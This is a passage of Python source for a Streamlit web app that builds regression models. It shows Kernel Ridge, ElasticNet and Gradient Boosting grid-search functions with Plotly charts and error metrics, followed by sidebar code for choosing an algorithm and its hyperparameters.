            fig = px.scatter(df, x=feature, y=Y_test.name, opacity=0.65)
            fig.add_traces(go.Scatter(x=X_test[feature], y=pred, name='Regression Fit'))
            st.plotly_chart(fig)
    st.write("The best parameters are %s with a score of %0.2f"
             % (clf.best_params_, clf.best_score_))
    st.subheader('Model Parameters')
    st.write(clf.get_params())
    st.subheader('Model Performance')
    st.write('Coefficient of determination ($R^2$):')
    st.info("%0.3f" % r2_score(Y_test, Y_pred_test))
    if criterion == 'MSE':
        st.write('Mean Squared Error (MSE):')
        st.info("%0.2f" % mean_squared_error(Y_test, Y_pred_test))
    if criterion == 'MAE':
        st.write('Mean Absolute Error (MAE):')
        st.info("%0.2f" % mean_absolute_error(Y_test, Y_pred_test))
    if criterion == 'RMSE':
        st.write('Root Mean Squared Error (RMSE):')
        st.info("%0.2f" % mean_squared_error(Y_test, Y_pred_test, squared=False))
    if criterion == 'All':
        st.write('Mean Squared Error (MSE):')
        mse = mean_squared_error(Y_test, Y_pred_test)
        st.info("%0.2f" % mse)
        st.write('Root Mean Squared Error (RMSE):')
        rmse = mean_squared_error(Y_test, Y_pred_test, squared=False)  # fixed `rsme` typo
        st.info("%0.2f" % rmse)
        st.write('Mean Absolute Error (MAE):')
        mae = mean_absolute_error(Y_test, Y_pred_test)
        st.info("%0.2f" % mae)
        criteria = ['RMSE', 'MSE', 'MAE']
        fig = go.Figure([go.Bar(x=criteria, y=[rmse, mse, mae])])
        # Set the bar mode BEFORE rendering; previously it was applied after
        # st.plotly_chart and had no effect.
        fig.update_layout(barmode='group')
        st.plotly_chart(fig)
################################################### Kernel Ridge
def build_model_KernelRidge(df):
    """
    Build a model using the Kernel Ridge regression algorithm.

    Takes input from the Streamlit web interface (globals ``split_size``,
    ``ind_var``, ``criterion``, ``param_grid``, ``scale``), tunes
    hyperparameters with GridSearchCV and plots the results using the
    Plotly framework.

    :param df: dataframe containing features and labels; the label must be
        the last column.
    """
    from sklearn.kernel_ridge import KernelRidge
    X = df.iloc[:, :-1]  # Using all columns except the last column as X
    Y = df.iloc[:, -1]  # Selecting the last column as Y
    st.markdown('A model is being built to predict the following **Y** variable:')
    st.info(Y.name)
    # Data splitting: the sidebar slider reports the TRAINING percentage
    # (10-90); convert it to the test fraction sklearn expects.
    X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=(100 - split_size) / 100)
    if scale == 'True':
        # Standardise features (the sidebar selectbox yields the STRING
        # 'True').  Scaler fitted on the training split only.
        from sklearn.preprocessing import StandardScaler
        cols = X_train.columns
        scaler = StandardScaler()
        scaler.fit(X_train)
        X_train = scaler.transform(X_train)
        X_test = scaler.transform(X_test)
        X_train = pd.DataFrame(X_train, columns=cols)
        X_test = pd.DataFrame(X_test, columns=cols)
    model = KernelRidge()
    if not ind_var:
        # Guard: without selected variables `clf` and `Y_pred_test` would be
        # unbound below, crashing at the best-parameters report.
        st.error('Please select at least one independent variable.')
        return
    if len(ind_var) == 1:
        # Single feature: grid-search on one column, draw a 2-D fit.
        dfx = X_train[ind_var[0]].values.reshape(-1, 1)
        dfxtest = X_test[ind_var[0]].values.reshape(-1, 1)
        clf = GridSearchCV(model, param_grid)
        clf.fit(dfx, Y_train)
        Y_pred_test = clf.predict(dfxtest)
        fig = px.scatter(df, x=ind_var[0], y=Y_test.name, opacity=0.65)
        fig.add_traces(go.Scatter(x=X_test[ind_var[0]], y=Y_pred_test, name='Regression Fit'))
        st.plotly_chart(fig)
    if len(ind_var) == 2:
        # Two features: render the prediction surface in 3-D.
        dfx = X_train[ind_var]
        dfxtest = X_test[ind_var]
        clf = GridSearchCV(model, param_grid)
        clf.fit(dfx, Y_train)
        mesh_size = .02
        margin = 0
        # Create a mesh grid on which we will run our model
        x_min, x_max = X_test[ind_var[0]].min() - margin, X_test[ind_var[0]].max() + margin
        y_min, y_max = X_test[ind_var[1]].min() - margin, X_test[ind_var[1]].max() + margin
        xrange = np.arange(x_min, x_max, mesh_size)
        yrange = np.arange(y_min, y_max, mesh_size)
        xx, yy = np.meshgrid(xrange, yrange)
        # Predict on every grid point, then reshape back into the grid
        pred = clf.predict(np.c_[xx.ravel(), yy.ravel()])
        pred = pred.reshape(xx.shape)
        Y_pred_test = clf.predict(dfxtest)
        fig = px.scatter_3d(df, x=ind_var[0], y=ind_var[1], z=Y_test.name)
        fig.update_traces(marker=dict(size=3))
        fig.add_traces(go.Surface(x=xrange, y=yrange, z=pred, name='pred_surface'))
        st.plotly_chart(fig)
    if len(ind_var) > 2:
        # Many features: score on all, then one per-feature 2-D view.
        dfx = X_train[ind_var]
        dfxtest = X_test[ind_var]
        clf = GridSearchCV(model, param_grid)
        clf.fit(dfx, Y_train)
        Y_pred_test = clf.predict(dfxtest)
        st.subheader(f"Visualization shows how {Y_test.name} is dependent on individual variable")
        clf1 = GridSearchCV(model, param_grid)
        for feature in ind_var:
            # Re-fit on each feature alone for the per-feature plot.
            dfx = X_train[feature].values.reshape(-1, 1)
            dfxtest = X_test[feature].values.reshape(-1, 1)
            clf1.fit(dfx, Y_train)
            pred = clf1.predict(dfxtest)
            fig = px.scatter(df, x=feature, y=Y_test.name, opacity=0.65)
            fig.add_traces(go.Scatter(x=X_test[feature], y=pred, name='Regression Fit'))
            st.plotly_chart(fig)
    st.write("The best parameters are %s with a score of %0.2f"
             % (clf.best_params_, clf.best_score_))
    st.subheader('Model Parameters')
    st.write(clf.get_params())
    st.subheader('Model Performance')
    st.write('Coefficient of determination ($R^2$):')
    st.info("%0.3f" % r2_score(Y_test, Y_pred_test))
    if criterion == 'MSE':
        st.write('Mean Squared Error (MSE):')
        st.info("%0.2f" % mean_squared_error(Y_test, Y_pred_test))
    if criterion == 'MAE':
        st.write('Mean Absolute Error (MAE):')
        st.info("%0.2f" % mean_absolute_error(Y_test, Y_pred_test))
    if criterion == 'RMSE':
        st.write('Root Mean Squared Error (RMSE):')
        st.info("%0.2f" % mean_squared_error(Y_test, Y_pred_test, squared=False))
    if criterion == 'All':
        st.write('Mean Squared Error (MSE):')
        mse = mean_squared_error(Y_test, Y_pred_test)
        st.info("%0.2f" % mse)
        st.write('Root Mean Squared Error (RMSE):')
        rmse = mean_squared_error(Y_test, Y_pred_test, squared=False)  # fixed `rsme` typo
        st.info("%0.2f" % rmse)
        st.write('Mean Absolute Error (MAE):')
        mae = mean_absolute_error(Y_test, Y_pred_test)
        st.info("%0.2f" % mae)
        criteria = ['RMSE', 'MSE', 'MAE']
        fig = go.Figure([go.Bar(x=criteria, y=[rmse, mse, mae])])
        # Set the bar mode BEFORE rendering; previously it was applied after
        # st.plotly_chart and had no effect.
        fig.update_layout(barmode='group')
        st.plotly_chart(fig)
################################################ Elastic Net
def build_model_ElasticNet(df):
    """
    Build a model using the Elastic Net regression algorithm.

    Takes input from the Streamlit web interface (globals ``split_size``,
    ``ind_var``, ``criterion``, ``param_grid``, ``scale``), tunes
    hyperparameters with GridSearchCV and plots the results using the
    Plotly framework.

    :param df: dataframe containing features and labels; the label must be
        the last column.
    """
    from sklearn.linear_model import ElasticNet
    X = df.iloc[:, :-1]  # Using all columns except the last column as X
    Y = df.iloc[:, -1]  # Selecting the last column as Y
    st.markdown('A model is being built to predict the following **Y** variable:')
    st.info(Y.name)
    # Data splitting: the sidebar slider reports the TRAINING percentage
    # (10-90); convert it to the test fraction sklearn expects.
    X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=(100 - split_size) / 100)
    if scale == 'True':
        # Standardise features (the sidebar selectbox yields the STRING
        # 'True').  Scaler fitted on the training split only.
        from sklearn.preprocessing import StandardScaler
        cols = X_train.columns
        scaler = StandardScaler()
        scaler.fit(X_train)
        X_train = scaler.transform(X_train)
        X_test = scaler.transform(X_test)
        X_train = pd.DataFrame(X_train, columns=cols)
        X_test = pd.DataFrame(X_test, columns=cols)
    model = ElasticNet()
    if not ind_var:
        # Guard: without selected variables `clf` and `Y_pred_test` would be
        # unbound below, crashing at the best-parameters report.
        st.error('Please select at least one independent variable.')
        return
    if len(ind_var) == 1:
        # Single feature: grid-search on one column, draw a 2-D fit.
        dfx = X_train[ind_var[0]].values.reshape(-1, 1)
        dfxtest = X_test[ind_var[0]].values.reshape(-1, 1)
        clf = GridSearchCV(model, param_grid)
        clf.fit(dfx, Y_train)
        Y_pred_test = clf.predict(dfxtest)
        fig = px.scatter(df, x=ind_var[0], y=Y_test.name, opacity=0.65)
        fig.add_traces(go.Scatter(x=X_test[ind_var[0]], y=Y_pred_test, name='Regression Fit'))
        st.plotly_chart(fig)
    if len(ind_var) == 2:
        # Two features: render the prediction surface in 3-D.
        dfx = X_train[ind_var]
        dfxtest = X_test[ind_var]
        clf = GridSearchCV(model, param_grid)
        clf.fit(dfx, Y_train)
        mesh_size = .02
        margin = 0
        # Create a mesh grid on which we will run our model
        x_min, x_max = X_test[ind_var[0]].min() - margin, X_test[ind_var[0]].max() + margin
        y_min, y_max = X_test[ind_var[1]].min() - margin, X_test[ind_var[1]].max() + margin
        xrange = np.arange(x_min, x_max, mesh_size)
        yrange = np.arange(y_min, y_max, mesh_size)
        xx, yy = np.meshgrid(xrange, yrange)
        # Predict on every grid point, then reshape back into the grid
        pred = clf.predict(np.c_[xx.ravel(), yy.ravel()])
        pred = pred.reshape(xx.shape)
        Y_pred_test = clf.predict(dfxtest)
        fig = px.scatter_3d(df, x=ind_var[0], y=ind_var[1], z=Y_test.name)
        fig.update_traces(marker=dict(size=3))
        fig.add_traces(go.Surface(x=xrange, y=yrange, z=pred, name='pred_surface'))
        st.plotly_chart(fig)
    if len(ind_var) > 2:
        # Many features: score on all, then one per-feature 2-D view.
        dfx = X_train[ind_var]
        dfxtest = X_test[ind_var]
        clf = GridSearchCV(model, param_grid)
        clf.fit(dfx, Y_train)
        Y_pred_test = clf.predict(dfxtest)
        st.subheader(f"Visualization shows how {Y_test.name} is dependent on individual variable")
        clf1 = GridSearchCV(model, param_grid)
        for feature in ind_var:
            # Re-fit on each feature alone for the per-feature plot.
            dfx = X_train[feature].values.reshape(-1, 1)
            dfxtest = X_test[feature].values.reshape(-1, 1)
            clf1.fit(dfx, Y_train)
            pred = clf1.predict(dfxtest)
            fig = px.scatter(df, x=feature, y=Y_test.name, opacity=0.65)
            fig.add_traces(go.Scatter(x=X_test[feature], y=pred, name='Regression Fit'))
            st.plotly_chart(fig)
    st.write("The best parameters are %s with a score of %0.2f"
             % (clf.best_params_, clf.best_score_))
    st.subheader('Model Parameters')
    st.write(clf.get_params())
    st.subheader('Model Performance')
    st.write('Coefficient of determination ($R^2$):')
    st.info("%0.3f" % r2_score(Y_test, Y_pred_test))
    if criterion == 'MSE':
        st.write('Mean Squared Error (MSE):')
        st.info("%0.2f" % mean_squared_error(Y_test, Y_pred_test))
    if criterion == 'MAE':
        st.write('Mean Absolute Error (MAE):')
        st.info("%0.2f" % mean_absolute_error(Y_test, Y_pred_test))
    if criterion == 'RMSE':
        st.write('Root Mean Squared Error (RMSE):')
        st.info("%0.2f" % mean_squared_error(Y_test, Y_pred_test, squared=False))
    if criterion == 'All':
        st.write('Mean Squared Error (MSE):')
        mse = mean_squared_error(Y_test, Y_pred_test)
        st.info("%0.2f" % mse)
        st.write('Root Mean Squared Error (RMSE):')
        rmse = mean_squared_error(Y_test, Y_pred_test, squared=False)  # fixed `rsme` typo
        st.info("%0.2f" % rmse)
        st.write('Mean Absolute Error (MAE):')
        mae = mean_absolute_error(Y_test, Y_pred_test)
        st.info("%0.2f" % mae)
        criteria = ['RMSE', 'MSE', 'MAE']
        fig = go.Figure([go.Bar(x=criteria, y=[rmse, mse, mae])])
        # Set the bar mode BEFORE rendering; previously it was applied after
        # st.plotly_chart and had no effect.
        fig.update_layout(barmode='group')
        st.plotly_chart(fig)
################################################# Gradient boosting
def build_model_GradientBoosting(df):
    """
    Build a model using the Gradient Boosting regression algorithm.

    Takes input from the Streamlit web interface (globals ``split_size``,
    ``ind_var``, ``criterion``, ``param_grid``, ``scale``), tunes
    hyperparameters with GridSearchCV and plots the results using the
    Plotly framework.

    :param df: dataframe containing features and labels; the label must be
        the last column.
    """
    from sklearn.ensemble import GradientBoostingRegressor
    X = df.iloc[:, :-1]  # Using all columns except the last column as X
    Y = df.iloc[:, -1]  # Selecting the last column as Y
    st.markdown('A model is being built to predict the following **Y** variable:')
    st.info(Y.name)
    # Data splitting: the sidebar slider reports the TRAINING percentage
    # (10-90); convert it to the test fraction sklearn expects.
    X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=(100 - split_size) / 100)
    if scale == 'True':
        # Standardise features (the sidebar selectbox yields the STRING
        # 'True').  Scaler fitted on the training split only.
        from sklearn.preprocessing import StandardScaler
        cols = X_train.columns
        scaler = StandardScaler()
        scaler.fit(X_train)
        X_train = scaler.transform(X_train)
        X_test = scaler.transform(X_test)
        X_train = pd.DataFrame(X_train, columns=cols)
        X_test = pd.DataFrame(X_test, columns=cols)
    model = GradientBoostingRegressor()
    if not ind_var:
        # Guard: without selected variables `clf` and `Y_pred_test` would be
        # unbound below, crashing at the best-parameters report.
        st.error('Please select at least one independent variable.')
        return
    if len(ind_var) == 1:
        # Single feature: grid-search on one column, draw a 2-D fit.
        dfx = X_train[ind_var[0]].values.reshape(-1, 1)
        dfxtest = X_test[ind_var[0]].values.reshape(-1, 1)
        clf = GridSearchCV(model, param_grid)
        clf.fit(dfx, Y_train)
        Y_pred_test = clf.predict(dfxtest)
        fig = px.scatter(df, x=ind_var[0], y=Y_test.name, opacity=0.65)
        fig.add_traces(go.Scatter(x=X_test[ind_var[0]], y=Y_pred_test, name='Regression Fit'))
        st.plotly_chart(fig)
    if len(ind_var) == 2:
        # Two features: render the prediction surface in 3-D.
        dfx = X_train[ind_var]
        dfxtest = X_test[ind_var]
        clf = GridSearchCV(model, param_grid)
        clf.fit(dfx, Y_train)
        mesh_size = .02
        margin = 0
        # Create a mesh grid on which we will run our model
        x_min, x_max = X_test[ind_var[0]].min() - margin, X_test[ind_var[0]].max() + margin
        y_min, y_max = X_test[ind_var[1]].min() - margin, X_test[ind_var[1]].max() + margin
        xrange = np.arange(x_min, x_max, mesh_size)
        yrange = np.arange(y_min, y_max, mesh_size)
        xx, yy = np.meshgrid(xrange, yrange)
        # Predict on every grid point, then reshape back into the grid
        pred = clf.predict(np.c_[xx.ravel(), yy.ravel()])
        pred = pred.reshape(xx.shape)
        Y_pred_test = clf.predict(dfxtest)
        fig = px.scatter_3d(df, x=ind_var[0], y=ind_var[1], z=Y_test.name)
        fig.update_traces(marker=dict(size=3))
        fig.add_traces(go.Surface(x=xrange, y=yrange, z=pred, name='pred_surface'))
        st.plotly_chart(fig)
    if len(ind_var) > 2:
        # Many features: score on all, then one per-feature 2-D view.
        dfx = X_train[ind_var]
        dfxtest = X_test[ind_var]
        clf = GridSearchCV(model, param_grid)
        clf.fit(dfx, Y_train)
        Y_pred_test = clf.predict(dfxtest)
        st.subheader(f"Visualization shows how {Y_test.name} is dependent on individual variable")
        clf1 = GridSearchCV(model, param_grid)
        for feature in ind_var:
            # Re-fit on each feature alone for the per-feature plot.
            dfx = X_train[feature].values.reshape(-1, 1)
            dfxtest = X_test[feature].values.reshape(-1, 1)
            clf1.fit(dfx, Y_train)
            pred = clf1.predict(dfxtest)
            fig = px.scatter(df, x=feature, y=Y_test.name, opacity=0.65)
            fig.add_traces(go.Scatter(x=X_test[feature], y=pred, name='Regression Fit'))
            st.plotly_chart(fig)
    st.write("The best parameters are %s with a score of %0.2f"
             % (clf.best_params_, clf.best_score_))
    st.subheader('Model Parameters')
    st.write(clf.get_params())
    st.subheader('Model Performance')
    st.write('Coefficient of determination ($R^2$):')
    st.info("%0.3f" % r2_score(Y_test, Y_pred_test))
    if criterion == 'MSE':
        st.write('Mean Squared Error (MSE):')
        st.info("%0.2f" % mean_squared_error(Y_test, Y_pred_test))
    if criterion == 'MAE':
        st.write('Mean Absolute Error (MAE):')
        st.info("%0.2f" % mean_absolute_error(Y_test, Y_pred_test))
    if criterion == 'RMSE':
        st.write('Root Mean Squared Error (RMSE):')
        st.info("%0.2f" % mean_squared_error(Y_test, Y_pred_test, squared=False))
    if criterion == 'All':
        st.write('Mean Squared Error (MSE):')
        mse = mean_squared_error(Y_test, Y_pred_test)
        st.info("%0.2f" % mse)
        st.write('Root Mean Squared Error (RMSE):')
        rmse = mean_squared_error(Y_test, Y_pred_test, squared=False)  # fixed `rsme` typo
        st.info("%0.2f" % rmse)
        st.write('Mean Absolute Error (MAE):')
        mae = mean_absolute_error(Y_test, Y_pred_test)
        st.info("%0.2f" % mae)
        criteria = ['RMSE', 'MSE', 'MAE']
        fig = go.Figure([go.Bar(x=criteria, y=[rmse, mse, mae])])
        # Set the bar mode BEFORE rendering; previously it was applied after
        # st.plotly_chart and had no effect.
        fig.update_layout(barmode='group')
        st.plotly_chart(fig)
# Page Layout ( Streamlit web Interface )
st.set_page_config(page_title="Regression Model Builder")
st.write("""
# Regression Model Builder
""")
# Sidebar ..............................................
# Sidebar - Collects user input features into dataframe
st.sidebar.header('Upload your CSV data')
uploaded_file = st.sidebar.file_uploader("Upload your input CSV file", type=["csv"])
st.sidebar.header("Parameter Configuration")
# NOTE(review): this slider yields the TRAINING-set percentage as an integer
# (10-90, default 80, step 5); downstream code passes it to
# train_test_split(test_size=...), where an int is interpreted as an absolute
# number of test rows — confirm the intended conversion to a fraction.
split_size = st.sidebar.slider('Data Split Ratio (training set)', 10,90,80,5)
st.sidebar.header("Select Regressor")
# The chosen algorithm decides which configuration branch below runs and
# which build_model_* function is eventually called.
reg = st.sidebar.selectbox("Choose Regression Algorithm", options=['Linear Regression', 'SVR',
    'Random Forest Regression', 'Adaboost', 'SGD Regression', 'Kernel Ridge Regression',
    'ElasticNet Regression', 'Gradient Boosting Regression'])
if reg == 'Random Forest Regression':
    # Sidebar configuration for the Random Forest grid search.
    st.sidebar.subheader('Learning Parameters')
    # Range slider: returns a (low, high) tuple spanning the n_estimators sweep.
    n_estimators = st.sidebar.slider('Number of estimators (n_estimators)', 0, 500, (10, 50), 50)
    n_estimators_step = st.sidebar.number_input('Step size for n_estimators (n_estimators_step)', 10)
    st.sidebar.write('---')
    # Range slider for max_features; NOTE(review): the upper bound of 50 may
    # exceed the number of columns in the uploaded dataset — verify upstream.
    max_features = st.sidebar.slider('Max features', 1, 50, (1, 3), 1)
    max_features_step = st.sidebar.number_input('Step Size for max Features', 1)
    st.sidebar.write('---')
    min_samples_split = st.sidebar.slider(
        'Minimum number of samples required to split an internal node (min_samples_split)', 1, 10, 2, 1)
    min_samples_leaf = st.sidebar.slider('Minimum number of samples required to be at a leaf node (min_samples_leaf)',
                                         1, 10, 2, 1)
    st.sidebar.subheader('General Parameters')
    random_state = st.sidebar.slider('Seed number (random_state)', 0, 1000, 42, 1)
    criterion = st.sidebar.selectbox('Performance measure (criterion)', options=['All', 'MSE', 'MAE', 'RMSE'])
    bootstrap = st.sidebar.selectbox('Bootstrap samples when building trees (bootstrap)', options=[True, False])
    oob_score = st.sidebar.selectbox('Whether to use out-of-bag samples to estimate the R^2 on unseen data (oob_score)',
                                     options=[False, True])
    n_jobs = st.sidebar.select_slider('Number of jobs to run in parallel (n_jobs)', options=[1, -1])
    # Expand the (low, high) tuples into inclusive value ranges for GridSearchCV.
    n_estimators_range = np.arange(n_estimators[0], n_estimators[1] + n_estimators_step, n_estimators_step)
    max_features_range = np.arange(max_features[0], max_features[1] + max_features_step, max_features_step)
    param_grid = dict(max_features=max_features_range, n_estimators=n_estimators_range)
if reg == 'Adaboost':
    # Sidebar configuration for the Adaboost grid search.
    st.sidebar.subheader('Learning Parameters')
    # Range slider: returns a (low, high) tuple spanning the n_estimators sweep.
    n_estimators = st.sidebar.slider('Number of estimators (n_estimators)', 0, 500, (10, 50), 50)
    n_estimators_step = st.sidebar.number_input('Step size for n_estimators (n_estimators_step)', 10)
    st.sidebar.write('---')
    criterion = st.sidebar.selectbox('Performance measure (criterion)', options=['All', 'MSE', 'MAE', 'RMSE'])
    lr = [0.0001, 0.001, 0.01, 0.1]
    # select_slider yields the two chosen endpoints of the learning-rate range.
    learning_rate = st.sidebar.select_slider('Range of Learning Rate (learning_rate)',
                                             options=[0.0001, 0.001, 0.01, 0.1], value=(0.0001, 0.01))
    # Slice the candidate list between the selected endpoints (inclusive).
    l = lr.index(learning_rate[0])
    r = lr.index(learning_rate[1])
    learning_rate_range = lr[l:r + 1]
    st.sidebar.write('---')
    st.sidebar.header("Loss")
    loss = st.sidebar.selectbox("Choose Loss",options=['linear', 'square', 'exponential'])
    st.sidebar.subheader('General Parameters')
    random_state = st.sidebar.slider('Seed number (random_state)', 0, 1000, 42, 1)
    n_jobs = st.sidebar.select_slider('Number of jobs to run in parallel (n_jobs)', options=[1, -1])
    # Expand the n_estimators tuple into an inclusive range for GridSearchCV.
    n_estimators_range = np.arange(n_estimators[0], n_estimators[1] + n_estimators_step, n_estimators_step)
    param_grid = dict(learning_rate = learning_rate_range, n_estimators=n_estimators_range)
if reg == 'Linear Regression':
    # Load the user CSV, or fall back to the sklearn diabetes demo dataset.
    if uploaded_file is not None:
        df = pd.read_csv(uploaded_file)
    else:
        diabetes = load_diabetes()
        X = pd.DataFrame(diabetes.data, columns=diabetes.feature_names)
        Y = pd.Series(diabetes.target, name='response')
        df = pd.concat([X, Y], axis=1)
    st.sidebar.subheader('Variable Configuration')
    # Multiselect feeds the module-level `ind_var` list read by the
    # build_model_* functions.
    ind_var = st.sidebar.multiselect('Choose Independent Variables', options=df.columns)
    st.sidebar.write('---')
    criterion = st.sidebar.selectbox('Performance measure (criterion)', options=['All', 'MSE', 'MAE', 'RMSE'])
if reg == 'SVR':
    # Load the user CSV, or fall back to the sklearn diabetes demo dataset.
    if uploaded_file is not None:
        df = pd.read_csv(uploaded_file)
    else:
        diabetes = load_diabetes()
        X = pd.DataFrame(diabetes.data, columns=diabetes.feature_names)
        Y = pd.Series(diabetes.target, name='response')
        df = pd.concat([X, Y], axis=1)
    st.sidebar.subheader('Variable Configuration')
    ind_var = st.sidebar.multiselect('Choose Independent Variables', options=df.columns)
    st.sidebar.write('---')
    criterion = st.sidebar.selectbox('Performance measure (criterion)', options=['All', 'MSE', 'MAE', 'RMSE'])
    st.sidebar.subheader("Hyperparameters for SVR")
    st.sidebar.subheader("Kernel")
    kernel = st.sidebar.selectbox("Enter from the options", options=['All', 'linear', 'rbf', 'poly'])
    # collect_numbers (defined elsewhere in this file) presumably parses the
    # comma-separated text into a numeric list — verify its empty-input
    # behavior, since these text boxes start blank.
    numbers = st.sidebar.text_input("Enter values for 'c'. (Separate values with ,)")
    C = collect_numbers(numbers)
    numbers = st.sidebar.text_input("Enter values for 'gamma'. (Separate values with ,)")
    gamma = collect_numbers(numbers)
    numbers = st.sidebar.text_input("Enter values for 'epsilon'. (Separate values with ,)")
    epsilon = collect_numbers(numbers)
    # 'All' expands to every kernel; otherwise wrap the single choice in a list.
    if kernel == 'All':
        kernel = ['linear', 'rbf', 'poly']
    else:
        kernel = [kernel]
    param_grid = dict(kernel = kernel, gamma = gamma, epsilon = epsilon, C = C)
if reg == 'SGD Regression':
    # Load the user's CSV if one was uploaded; otherwise fall back to the
    # sklearn diabetes demo dataset (features + 'response' target column).
    if uploaded_file is not None:
        df = pd.read_csv(uploaded_file)
    else:
        diabetes = load_diabetes()
        X = pd.DataFrame(diabetes.data, columns=diabetes.feature_names)
        Y = pd.Series(diabetes.target, name='response')
        df = pd.concat([X, Y], axis=1)
    st.sidebar.subheader('Variable Configuration')
    ind_var = st.sidebar.multiselect('Choose Independent Variables', options=df.columns)
    st.sidebar.write('---')
    criterion = st.sidebar.selectbox('Performance measure (criterion)', options=['All', 'MSE', 'MAE', 'RMSE'])
    st.sidebar.subheader("Standard Scaling")
    # NOTE(review): this yields the *string* 'True'/'False', not a bool; the
    # downstream build_model_SGD presumably converts it — confirm.
    scale = st.sidebar.selectbox("Scale the data to be between -1 to 1", options=['True', 'False'])
    st.sidebar.subheader("Hyperparameters for SGD Regressor")
    numbers = st.sidebar.text_input("Enter values for 'alpha'. (Separate values with ,)")
    alpha = collect_numbers(numbers)
    # NOTE(review): 'squared_loss' was renamed 'squared_error' in scikit-learn
    # >= 1.2 — verify against the pinned sklearn version.
    loss = st.sidebar.selectbox("Loss", options=['All', 'squared_loss', 'huber', 'epsilon_insensitive'])
    penalty = st.sidebar.selectbox("Penalty", options=['All', 'l2', 'l1', 'elasticnet'])
    learning_rate = st.sidebar.selectbox("Learning Rate", options=['All', 'constant', 'optimal', 'invscaling'])
    # 'All' expands each option to the full candidate list; otherwise wrap the
    # single choice so the grid dict always holds lists.
    if loss == 'All':
        loss = ['squared_loss', 'huber', 'epsilon_insensitive']
    else:
        loss = [loss]
    if penalty == 'All':
        penalty = ['l2', 'l1', 'elasticnet']
    else:
        penalty = [penalty]
    if learning_rate == 'All':
        learning_rate = ['constant', 'optimal', 'invscaling']
    else:
        learning_rate = [learning_rate]
    # Hyperparameter grid for grid-search tuning of the SGD regressor.
    param_grid = dict(alpha = alpha, loss = loss, penalty = penalty, learning_rate = learning_rate)
if reg == 'Kernel Ridge Regression':
    # Load the user's CSV if one was uploaded; otherwise fall back to the
    # sklearn diabetes demo dataset (features + 'response' target column).
    if uploaded_file is not None:
        df = pd.read_csv(uploaded_file)
    else:
        diabetes = load_diabetes()
        X = pd.DataFrame(diabetes.data, columns=diabetes.feature_names)
        Y = pd.Series(diabetes.target, name='response')
        df = pd.concat([X, Y], axis=1)
    st.sidebar.subheader('Variable Configuration')
    ind_var = st.sidebar.multiselect('Choose Independent Variables', options=df.columns)
    st.sidebar.subheader("Standard Scaling")
    # NOTE(review): string 'True'/'False', not a bool — downstream helper
    # presumably converts it; confirm.
    scale = st.sidebar.selectbox("Scale the data to be between -1 to 1", options=['True', 'False'])
    st.sidebar.write('---')
    criterion = st.sidebar.selectbox('Performance measure (criterion)', options=['All', 'MSE', 'MAE', 'RMSE'])
    st.sidebar.write('---')
    st.sidebar.subheader("Hyperparameters for Kernel Ridge Regression")
    st.sidebar.subheader("Kernel")
    kernel = st.sidebar.selectbox("Enter from the options", options=['All', 'linear', 'rbf', 'poly'])
    # Comma-separated numeric lists parsed by the collect_numbers helper.
    numbers = st.sidebar.text_input("Enter values for 'alpha'. (Separate values with ,)")
    alpha = collect_numbers(numbers)
    numbers = st.sidebar.text_input("Enter values for 'gamma'. (Separate values with ,)")
    gamma = collect_numbers(numbers)
    # 'All' expands to every kernel; otherwise wrap the single choice in a list.
    if kernel == 'All':
        kernel = ['linear', 'rbf', 'poly']
    else:
        kernel = [kernel]
    # Hyperparameter grid for grid-search tuning of kernel ridge regression.
    param_grid = dict(kernel = kernel, gamma = gamma, alpha = alpha)
if reg == 'ElasticNet Regression':
    # Load the user's CSV if one was uploaded; otherwise fall back to the
    # sklearn diabetes demo dataset (features + 'response' target column).
    if uploaded_file is not None:
        df = pd.read_csv(uploaded_file)
    else:
        diabetes = load_diabetes()
        X = pd.DataFrame(diabetes.data, columns=diabetes.feature_names)
        Y = pd.Series(diabetes.target, name='response')
        df = pd.concat([X, Y], axis=1)
    st.sidebar.subheader('Variable Configuration')
    ind_var = st.sidebar.multiselect('Choose Independent Variables', options=df.columns)
    st.sidebar.subheader("Standard Scaling")
    scale = st.sidebar.selectbox("Scale the data to be between -1 to 1", options=['True', 'False'])
    st.sidebar.write('---')
    criterion = st.sidebar.selectbox('Performance measure (criterion)', options=['All', 'MSE', 'MAE', 'RMSE'])
    st.sidebar.write('---')
    st.sidebar.subheader("Hyperparameters for ElasticNet Regression")
    st.sidebar.subheader("Selection")
    selection = st.sidebar.selectbox("Enter from the options", options=['All', 'cyclic', 'random'])
    # Comma-separated numeric lists; defaults match sklearn's ElasticNet
    # defaults (alpha=1.0, l1_ratio=0.5).
    numbers = st.sidebar.text_input("Enter values for 'alpha'. (Separate values with ,)", value='1.0')
    alpha = collect_numbers(numbers)
    numbers = st.sidebar.text_input("Enter values for 'l1_ratio'. (Separate values with ,)", value='0.5')
    l1_ratio = collect_numbers(numbers)
    fit_intercept = st.sidebar.selectbox("Whether the intercept should be estimated or not", options=['Both', 'True', 'False'])
    # if fit_intercept == 'Both' or fit_intercept == 'True':
    #     normalize = st.sidebar.selectbox("Regressors X will be normalized before regression by subtracting the mean and dividing by the l2-norm",
    #                                      options=['Both', 'True', 'False'])
    #     if normalize == 'Both':
    #         normalize = ['False', 'True']
    #     else:
    #         normalize = [normalize]
    # 'All'/'Both' expand to every candidate; otherwise wrap the single choice.
    if selection == 'All':
        selection = ['cyclic', 'random']
    else:
        selection = [selection]
    if fit_intercept == 'Both':
        fit_intercept = ['False', 'True']
    else:
        fit_intercept = [fit_intercept]
    # NOTE(review): fit_intercept candidates are the *strings* 'True'/'False';
    # sklearn's ElasticNet expects booleans — verify build_model_ElasticNet
    # converts them before fitting.
    # if fit_intercept.__contains__('True'):
    #     param_grid = dict(selection = selection, l1_ratio = l1_ratio, alpha = alpha,
    #                       fit_intercept = fit_intercept, normalize = normalize)
    # else:
    # Hyperparameter grid for grid-search tuning of ElasticNet.
    param_grid = dict(selection=selection, l1_ratio=l1_ratio, alpha=alpha,
                      fit_intercept=fit_intercept)
if reg == 'Gradient Boosting Regression':
    # Load the user's CSV if one was uploaded; otherwise fall back to the
    # sklearn diabetes demo dataset (features + 'response' target column).
    if uploaded_file is not None:
        df = pd.read_csv(uploaded_file)
    else:
        diabetes = load_diabetes()
        X = pd.DataFrame(diabetes.data, columns=diabetes.feature_names)
        Y = pd.Series(diabetes.target, name='response')
        df = pd.concat([X, Y], axis=1)
    st.sidebar.subheader('Variable Configuration')
    ind_var = st.sidebar.multiselect('Choose Independent Variables', options=df.columns)
    st.sidebar.subheader("Standard Scaling")
